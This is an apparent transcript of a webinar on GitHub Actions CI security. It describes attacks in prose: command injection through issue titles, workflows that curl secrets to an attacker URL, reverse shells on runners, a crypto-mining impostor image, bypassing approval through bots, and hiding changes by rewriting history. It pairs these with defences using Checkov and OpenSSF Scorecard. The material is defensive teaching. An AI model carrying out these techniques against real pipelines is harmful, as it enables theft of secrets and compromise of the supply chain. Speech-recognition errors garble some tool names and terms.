 Thank you very much. So many thanks to the Linux foundations for giving me the stage and today we're going to talk about four CI security best practices by trying to crack some of our CI pipelines and see what happens and we'll try to gain control of those CI runners and see in the end of it how can we prevent it. So my name is Barack Shoster. I'm working at Palo Alto Networks. I was the CTO and co-founder of Bridge Crew who's today part of Palo Alto Networks a lab line. So if you want to send some over I live in Israel and you come to visit we can have some fun about that and I'm a huge Star Wars fan. So what are we going to work through today? We're going to cover the basic CI system that is most popular today which is GitHub Actions and we'll talk about what could go wrong. What are the external threats and the internal threats? What are the different attack vectors and how can we prevent it using open source tools only? Let's start with some background. OSP have made a great list of top 10 issues that each application developer should look on. One of them is broken access controls. In the use case of CI systems you might gain access to code or hosts running your code that you shouldn't have access into. Another one is insecure design. If your CI pipeline is misconfigured which is attached to the next OSP issue you can actually utilize that fact to gain control over code or more machines. You might have unremovable and outdated components and a bunch of logging and monitoring issues. Misconfiguration is a supply chain risk. How does a misconfiguration look in GitHub? Let's say that your system is built from a database, a web application, a CDN and your system is continuously deployed using a platform like GitHub Action in a set of jobs chained in a set of events that is deploying your code from the version control system into the running instance in production. So effectively part of your running application is the supply chain itself which is the CI pipeline and the version control system or also called the source control management system. So we construct this pipeline of publishing code from the version control system to production from a set of jobs that are running on ephemeral hosts or static hosts we call runners. Each of those jobs run a set of steps that test the code, package the code, release the code, version the code. In some cases, obfuscate the code and run security analysis. But who watches the watchman? Who watches the CI pipeline itself? So on this talk we'll focus on one system of CI pipeline but it's important to say that each CI pipeline has their own caveats. GitHub have made an amazing guide on how to harden the CI pipeline in the workflows and we're going to walk through some of that guide and see how people are not following that guide are making their CI pipelines vulnerable. So workflows files are a flavor of CI pipelines. Other famous systems are Jenkins, Bitbucket pipelines, GitLab CI, Circle CI and the list goes on. So we're just using the most popular one. The GitHub workflow files are stored in the workflows directory within a code repository to perform different tasks, to build, to test, to deploy, to label a new issue. All of those stuff are mentioned in the GitHub documentation. The fundamental problem of it is one, someone can commit a new file to your workflow system and by that trigger a new workflow to be executed. Another caveat with that is metadata fields can be used for injection attacks. Similar to SQL injection in web forms in your web application, you can utilize fields that are user input like the issue name, the issue description, the request name and request description to inject malicious code because it's just like any input form can be utilized for code injection. And the last thing is that Git, the protocol, not only GitHub, the protocol itself does not enforce access control by default. Meaning when I'm giving access to my colleagues, they have full control whether it is read or write or the same level of control across all the files within that code repository. And breaking stuff into micro repositories is not always an easy task for an organization that is using a single repository as the source of truth. So a few GitHub attack vectors, one of them is injection of code via the PR title or the issue title. And we'll use that to exploit existing workflows. Another one is we'll try to push a new workflow and bypass some branch protection rules like making sure that you have code approvers before merging a pull request. And another one will try to exploit the workflow files to gain access to secrets of a production environment and even take control over the host itself. Let's start with reading from the simple guide. So about six months ago, we had an attack attempt made by a contributor to an open source project that I'm part of the maintainers team. The open source project is called Chekhov. Luckily, to contribute to Chekhov, you'll need to pass through branch protection rules that are preventing from first time contributors to run workflows. And it also requires approvers to run workflows. And this is because the Chekhov maintainers team have taken the steps to harden the workflow. But if you don't, that's what you'll see when a new contributor comes and try to contribute a piece of code to your software. You'll get an easy button called approve and run. Now I'm really tempted to click this button to make the unit test work. But under documentation, it is listed that we should inspect proposed changes in workflows to ensure that we are comfortable with any changes made in the pull request. And we should especially be alerted about proposed changes in the GitHub workflows file. Well, why is that? Because if you have access to the workflow files, you might gain access to environment variables, for example, the secrets that are required to publish your software to the production environment. Access keys to AWS, access keys to your Artifactory, or to PiPi. So in order not to be tempted to click approve and run, and in order to have a review process on it, it is recommended to have a set of branch protection rules on the topic of outside collaborators that are contributing for the first time. We would like to require approval for all outside contributors, not even for the first time, but for every time. Why? Because if someone collaborates with our company team one time, it doesn't mean that he or she won't have account takeover over time. And it also doesn't mean that they will only do good over time. Let's say that I've contributed a code fix to an open-source repository fixing a typo, which is an innocent act. I really appreciate this contribution. But what happens if my second contribution would be injecting malicious code? That's not something that I'd like to approve. Let's see a real attack that was attempted on checkup. So we had an anonymous user called Miong34 trying to submit a pull request to our open-source repository who has more than 200 outside collaborators and more than 10 million downloads. Now, it's a popular open-source package, and it is likely for attackers to want to get control over it. What did Miong try to do? Instead of using our own build workflow, Miong34 contributed a new build workflow triggered on every pull request, printing off the environment variables, including the secrets that exist within the environment variables. As a result, if it would have succeeded, Miong could have gained access to our pipeline repository, to our AWS environment where our self-hosted runners are at, et cetera. Luckily, we have a bunch of protections to prevent that from happening. So the first protection would be making sure that you have approvers that are approving to run this work because you don't want the environment variables to be exploited. What else can be in environment variables? So it can be AWS secrets. It can be passwords and connection strings to databases. You can also change the logging level and print those, even if they are not in the environment variables. You can get access to the location of the code if you can control over the host itself. You can gain the GitHub token and by that run code modification that will be deployed to production. And you can learn the network by executing EdMap if you can control over the host itself. For that reason, we have environment protection rules where we say that only a specific job in a specific context can gain access to a specific secrets. And we can have a rule around environment protection rules, requesting approval to run a workflow that has access to encrypted data or to secrets data. Let's see how it looks like. I have here a general flow called deployment. This flow is deploying a new version of GitHub.com and it runs on every push to the main branch representing my production environment. So I can create a rule that says that a specific set of environment variables are only accessible within that context. And our thing that I can do is remove the usage of secrets at all. I can give, if I'm using AWS, I can give the different self-hosted runners instead of AWS access fees a role and using roles and STS tokens of the tokens of gaining access to AWS are temporal and they're having automatic rotation. And even if they're actually traded, they're only valid for a short amount of time. I can also limit that specific role to give access only from a specific set of IP addresses that can be under a private range. And if the attacker does not have the same range of IP addresses, they won't be able to utilize this specific role and won't be able to take over my AWS environment. Now, let's start with attacking our pipeline. We have identified a real repository having a real workflow file and that is making the environment vulnerable. In this specific repository, we have a website that is automatically taking a GitHub issue, taking the title and programmatically generating a web page from each GitHub issue. Now, what can I do with that? I can inject a phishing attempt saying session expired, that's the name of the issue. Please log in to proceed and put my own malicious website address. So it will generate automatically a new website page with an attack, with a phishing attack. I can even make it worse. Searching through GitHub, we found thousands of examples of people doing issue grooming, echoing the issue titles and body into the context of the workflow file itself. What does that mean if I'm echoing the issue? It means that I can actually run remote code execution by creating a new issue and injecting that title in it. So over here, I've done some code commands to a workflow site, created the issue, it's running, might take a few seconds, and it can leak some of the data, for example, environment variables. Now, that was simple. You can sanitize always the input of the issue titles when you're making any code assumptions that are echoing the title or accessing any input validation fields. But it can even get more complex. Let's see how is that working? I'm creating a new workflow. Let's say that I have access to that workflow and I'm putting an image within it called gaykwsenginex. Now, this image does not exist anymore, but it used to be about a year and a half ago. And what did it run? This Nginx-like image is actually running a crypto mining attack. And on every build or every pull request, the crypto mining is running on the expense of my GitHub runners and is producing money to the attacker. How did they do that? They just created an image named Nginx and instead of running the Nginx binary, executing the XMRIK binary, which is a crypto miner. Simple. Another hack that can happen, we have branch protection rules. But when I create a new repository, the default is to have only one approval. And actually this thing can be piped fast using another GitHub action. I can create a GitHub action having a step that is authorizing using a GitHub token to hit the approve API. So what does that mean? That instead of having a human being reviewing my code change request, I have a code that auto approves that using this event and care command. And I can skip the branch protection rules as a result. So it was possible, but GitHub have noticed that and required approval credentials early 2022. And today the default is not to allow GitHub actions to create automatic pipelines to approve for requests. But you should know that you should never check that box because in that case, people can skip your branch protection rules. And it's super easy and it looks the same. Now let's see another hack that we have on our specific environment. Every GitHub action have a temporal token. And you can also give your GitHub action or specific steps within the workflow of the GitHub action tokens with more permissions. And every permission and every token has a timeout. The GitHub token expires after the maximum of 24 hours. But it's kind of hard to get because if it's in a job context, it takes six hours. So you have a short-term temporal token that can execute for six hours in total. And it has a default access, which is read. And you cannot do really much. And you have another default access, which is more permissive. And for forced repositories, it's read only. But still you have access to the code, to the check status, to the request, et cetera, even to the security data itself. And you can even create automations that have access to secrets saved within your GitHub repositories. But you should always save your GitHub token as a secret and not as an environment variable. As a result, it will be hidden in logs and when you print those out in your application. Now let's see how we can export that piece too. I have a new workflow file called CI Secrets. It's happening on some specific triggers. It has a set of jobs. The first one is named build. The image is not a known vulnerable image like the NGINX one. It's an improved tool, and it has a bunch of steps. The first one is to check out the code. And the second one is to echo of the secrets within the environment and curl this data into a bad URL. And then send also the environment variables into that malicious bad URL. Let's zoom in on it. Here we have it. This card command into a bad URL. So what can we do with an overprivileged GitHub token? One, don't grant it to actions that you do not trust from the GitHub marketplace. Only do that for vetted GitHub actions that you have trust on. Let's see what could happen. So over here I have a GitHub organization named Notcore or some open source school GitHub repository. I have an attacker thinking, hey, I should really look for who's using my built-in marketplace action called Auto Merge++ or something like that. People want to Auto Merge stuff in some cases. So I can create a malicious action. I can publish it to the internet. I can request access token because you do need the right access to approve Auto Merge. And you can also inject bad code to the latest version of the existing action. As a result, the attacker will gain access to the code repository and to the running agents or running runners executing the test over code. Let's see how it looks like. I'll create a card command. I'll post all the secrets to a bad URL. I'll even do a sleep to make it look like it's running for a long time. And I can even do an MC and open a listening port. Let's do it. So I curled it out to a web hook site generated for this specific need. I also have an Auto Approve process on my changes. And I have another server just listening on a specific port. I'm creating a new branch with those specific changes that are curling out of the environment secrets. It's running. Might take forever. I gain access to the invariant variables and the secrets that the environment had because it's printed out into the web hook site. I can see the Postgres password. I can see the GitHub token. I can see the AWS key, which is a scary long scene. And another super secret. Oh, no. And from that moment forward, I have remote shell access from my listening server into the running post. And I can run less commands. The result is a reverse shell. Potentially on a self-hosted runner or on a firmware runner, like the default 2.2 runner of the GitHub workflows. And I can even hide how I actually done it because from the runner, I can create another commit editing my Git history and removing this change. So I can have access to the runner and I can remove everything from the Git history. It will exist on the GitHub audit, but it will not exist on the Git commit log. So kind of funny. We have some time, so we'll do another interesting bonus hack. So we have RCI runners, like GitHub Actions and Jenkins, et cetera. But we have another set of YAML-like workflows. One of them is ArgoCD. And ArgoCD is a tool that is used to deploy Kubernetes application into a running cluster. It's usually an instant CD system. So it has this YAML format. When you have an entry point, you have a container that you define. And that's it. Simple, right? Now, we'll use a tool that I'll explain after this slide how to install, but we'll use another tool to understand if we have any issues within that file. We'll pip install check-off. We'll run check-off to scan a specific directory and to run a specific check. This check is ensuring that no workload pods are running as root. And it appears that I'm failing that specific check. What does that mean? That a user can get root access to the CD worker. The same CD worker that is deploying new code from the version control system into the running Kubernetes cluster. What does that mean? That if I inject bad malicious package, I can run untrusted code on the host that is deploying code to my production. What does that mean? That I can get access, admin access, to deploy new code. And I can deploy malicious code. And by that gain access to the production servers and to exhortate all of the customer's data or sensitive data out of it. Now, how can we prevent that from happening? It's a simple code change. We just add a security context. We choose a user. That is not true. We give them a user ID. And that's it. Your CD system shouldn't run as root. Because there is no point of having root access to the Linux host itself. Now, let's talk about prevention. So GitHub has their best practices. And it's really a shared responsibility model. Similar to the AWS. You can ignore the security guides of the version control system. Or you can read it and harden your environment. Now, it takes some effort. It's not an easy task. But you should allocate time to do so. The full guide is over this link. But we'll go over some of the common best practices that you should see and that you're looking into. One, be careful when you're adding new contributors. You don't want to have an external contributor trying to exhortate your environment variables data. You should turn on branch protection rules. And to have at least two approvers for every code change. You can also add branch protection rules to prevent any force pushes. You can enforce MFA and SSO as part of your branch protection rules and repository protection rules. You can scope down secrets on the environment. You shouldn't allow running work profiles. Unless you're 100% sure during that malicious. You can prevent usage of any tokens by using roles and restrict those roles to specific IP addresses. You can make sure that your code is actually signed by the authority that made this code change. And you can have code owners files. Code owners use a specific file letting you as a repository maintainer define who should review a code before a change. So using code owners file, I can enforce a review process of my DevOps team before any changes accepted by either internal or external contributor to my CI pipelines. And it's even listed here in the security guidelines. And I know that not all of us are doing so because there is a lot of GitHub open source repositories that does not have code owners defined. And it's even listed that people with admin or owner permissions can set up the code owners file, but no one else should have this level of access editing it. And the people who choose as code owners must have read permission to the repository. That makes sense. And when the code owner is in the team, the team must be visible that also makes sense. But the thing that is important is that it gives you ownership to either change the code or to ask for a review if someone else is doing a change to that. Now, how can you discover if you have all those best practices implemented within your organization? One amazing open source tool that is contributed by the team at Google is called OpenSSF. It's free and open source, and it has a bunch of built-in CI checks on top of GitHub. It's asking the GitHub.com using the GitHub APIs and a personal access token. If you're using branch protection rules, if you have contributors assigned to the project, if you have SCA scanning on your, or the image scanning too, on your GitHub repository, and does the tokens that are used within this project are read only or do you have any, you have tokens that has write access? It's pretty easy to start it. It's on GitHub.com OSSF scorecard. And it also has a marketplace action that you can add and scan periodically on your GitHub repository. And another open source tool that I'm happy to be one of the contributors to is Czechov. So Czechov is really a Swiss army knife where you can scan a lot of stuff. It was originally built to scan infrastructure as code, but since then it also has expanded to scan the version of control system configuration, meaning GitHub, GitHub, GitHub, and to scan the CI pipelines themselves and to prevent attacks like pipeline poisoning that we've seen today. It has a bunch of built-in checks to all of those systems and you can add custom checks too. The thing that I'd recommend to do is to download it for Frids under Apache 2 license. It has a lot of external contributors. So I would say that if you want to contribute more, feel free to reach out to me over Twitter, LinkedIn, or any other platform. And I can walk you through the contribution process. But let's see how it works. All right. So we have the workflow files that I've shown when I exerted those GitHub actions. Let's see what happens when we scan it after we've installed Czechov and run it with Czechov minus D, marking the directory of the workload files. So I can see that Czechov actually said, hey, there is a suspicious use of curl with secrets because Czechov knows how to parse the different steps and to analyze whether card commands are being in use with the word secret, which is a saved word for something that is sensitive. And I think that Czechov identified is that we have an echo process printing a title. Now, it's also a vulnerable thing that we've seen because we can inject a curl command or a WGAP command that will exhortate the issue and the GitHub token into a website, for example. And the last thing, Czechov has another feature under feature flag named image referencing, where you can scan every image that exists within the workflow file itself and identify if you have any known CDs. And with that, you can understand if you are vulnerable to the same attack as the engineering attack that was published where you're running crypto miner. So if there is a known CV on every step that is running within an image, Czechov will be able to identify it too. You can run Czechov as a GitHub action. And my recommendation would be to run it as the first GitHub action, even before doing tests, even before running a build, etc. Because that's the first thing you'd like to check. And the first step that you'd like to have is did someone make a bad change to my workflow file? If it has, I don't want that change to run. I want to stop the build at that point. And the thing that you'll get, you'll get a set of checks that are failing after a few seconds, even if someone is trying to contribute them, it will break the build and it will not run in the malicious code. So what does it mean? Secure design takes a lot of work. And the default rules and the default branch protection rules are not what you would expect from an hardened environment. It takes more open source tools like open SSF scorecard, Czechov, and others can help. Another thing that you should understand is that misconfigurations are a real risk. You can have your workflow files misconfigured, you can have your version control system misconfigured within the GitHub console. And those are actual vulnerabilities that a attacker can use to hurt your organization. The defaults are not secure. The pipeline code is another piece of your application that should be inspected on every change. I don't like to write bugs. I do it all the time, because that's the nature of writing software. And it's also the nature of my colleagues, even though we hold each other to high standards. But we echo stuff in the pipelines, because they are hard to debug. And if I echo the wrong thing within it, I can create a major issue in my security posture. Fixing issues like infrastructure as code or pipelines that we consider as infrastructure as code, pipeline as code, are easy when you use those open source tools like open SSF and Czechov. And they are easy if you catch them early. And I really recommend to read more of the GitHub security hardening guide that specific link. Now, the thing that we're going to do is we're going to try to check about live and see how it works. Let's open the terminal. I'm going to change the screen sharing settings. So we have over here our terminal. And within that terminal, we have an example, CD file. In order to understand the issues that it has, I'm going to read it. And it's the same file that we've seen in the presentation. It has a Docker image. It has this command. Looks pretty simple. And I think that I'm going to do now is I'm going to run pip install checkup. Now, I've already done it before this presentation. So I have checkup installed over here. I can check the version. Probably done something bad before. Here you are as a demo. That's the checkup version. And I can run checkup on the current directory. To do that, I'm using checkup minus day. Let's look at the help before doing that. Checkup has a lot of flags. There is really only one that you should remember as a default. Not all of those knobs and switches. Just minus day. That's the only one that matters. Sorry. I'm going to run checkup minus day and put it on the current directory. Now, the thing that it will do, if I have a lot of files in the directory or if I have files referencing a different set of files, a graph will be built with all the different connections and will identify all the different issues within the checkup identified within the workflow files. It will do the same over infrastructure as code files, image files, etc. So the thing that you would do is see the output of failing checks. And we have two issues within my Argo file. One, I'm using the default service account. That's bad. Two, I'm using a non-root user. Now, to fix that, the thing that I'll do is I'll edit this VI. And the thing that I need to add here is the user and the user ID. So I'm going to copy a pre-made example. And I'm going to paste it here for a second. So I'm going to add here security context. And I don't want to run as root user. Now let's scan again. And we'll hope that I'll have a passing check now. Here we go. We have one thing that we fixed, which is running as non-root user. I still need to fix the service account, but that will wait for another time. Now, how can you be even more productive? You can put it in GitHub Actions. You can run it as a CLI tool, but you can also define it as part of your ID. So Checkup has two ID extensions. One is for VS Code. And another one is for the JetBrains stack. So you can choose whatever you'd like. And how can you get access to it? And again, this is open source too. You can type in over Google, check up VS Code, get into the GitHub repository. It's pretty simple. You can install it just like that through the VS Code marketplace. And you'll get your code scanned pretty fast. And you'll see the results and automated suggestions to code fixes. So I see that we have a few questions. It was only an internal comment. So guys, if you do have any open questions, you can publish them up in the Q&A section. And I'd be happy to answer all of them. Right. So I see that we don't have any open questions. So I'm going to let the Linux Foundation take over the Zoom session now. Thank you so much, Barak, for your time today. And thank you, everyone, for joining us. As a reminder, this recording will be on the Linux Foundation YouTube page later today. We hope you join us for future webinars and have a wonderful day. Thank you, everybody. Oh, you know what, Barak, we did actually just get one question in. If you want to answer. Yeah, sure. So the question was, can you force use of this tool in every workshop? The answer is yes. One way to do that is to enforce pre-commit hook across all of your environments, across all of your workstations. Another one is to commit checkout across all of your workflow files. And if you want to orchestrate a larger solution, you can always use the commercial offering of Palo Alto Networks, which orchestrates that at scale. Check-off is an open source tool that is used both by individuals and enterprises, but it's really easier to scale that using a managed solution. So I would recommend to check this out at Bridge Crew IO. Thank you, Robert. Thank you so much, Barak. And let's see. It looks like we might have got the last question. So thank you again, everyone. And again, check out the recording on our YouTube page and have a wonderful day.